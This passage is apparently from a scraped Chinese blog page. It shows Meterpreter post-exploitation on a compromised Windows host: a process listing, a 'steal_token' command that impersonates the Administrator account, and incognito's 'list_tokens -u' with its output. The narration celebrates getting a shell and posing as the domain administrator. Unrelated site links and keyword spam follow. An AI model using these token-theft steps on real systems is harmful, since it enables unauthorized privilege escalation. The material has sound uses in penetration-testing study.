 1480  VMwareTray.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe 1860  1480  VMwareUser.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareUser.exe 1888  1480  ctfmon.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\ctfmon.exe 1956  1092  wscntfy.exe        x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\wscntfy.exe


入侵成功,得到shell。


meterpreter > steal_token 632Stolen token with username: ROOT-9743DD32E3\Administratormeterpreter >

成功地假冒了域管理员账号。

如果ps不能列出域管理员运行的进程,用下面的命令。

meterpreter > use incognitoLoading extension incognito...success.meterpreter > list_tokens -u[-] Warning: Not currently running as SYSTEM, not all tokens will be available             Call rev2self if primary process token is SYSTEMDelegation Tokens Available========================================No tokens availableImpersonation Tokens Available========================================No tokens availablemeterpreter >



网络数据挖掘 网络数据挖掘
原创粉丝点击
热门IT博客
在阿里云上搭建hadoop在阿里云上搭建hadoop
javascript alert参数javascript alert参数
重启网卡 linux
oracle数据库块大小
萧山网络问政平台
阿里云邮箱客户端
软件开发公司资质
台湾人 知乎
淘宝如何做数据包
约什霍华德生涯数据
admaster数据分析岗
手机制作软件的软件
淘宝火炬红包微信群
威海淘宝
sql server hadoop
python画韦恩图
java初始化顺序
国产电视机推荐 知乎
跳跃网络CEO
bearychat linux
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 k频到分享系统 美拍自我分享原创 k频道网红分享系统 分享英语怎么说 关于分享的议论文 关于分享的事例 关于分享的名言 分享英文怎么说 图片分享平台 关于分享的故事 分享作文800字 关于分享的图片 分享什么意思 分享是什么意思 关于分享的名人名言 购物分享网站 创业经历分享 分享生活留住感动 销售案例分享 销售经验分享 适合早会分享的故事 营销经验分享 保险增员分享 标准分享网免费下载 工作经验分享怎么写 android qq分享 圣经经文分享 免费wifi分享 宝宝不懂分享 移动分享套餐 创业经验分享 励志美文分享 有关分享的谚语 分享照片的app 早会分享故事 美丽说如何分享宝贝 分想 k频道国产网红分享 k频道网络在线分享 服装销售案例分享 k频道在线播放网络分享

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里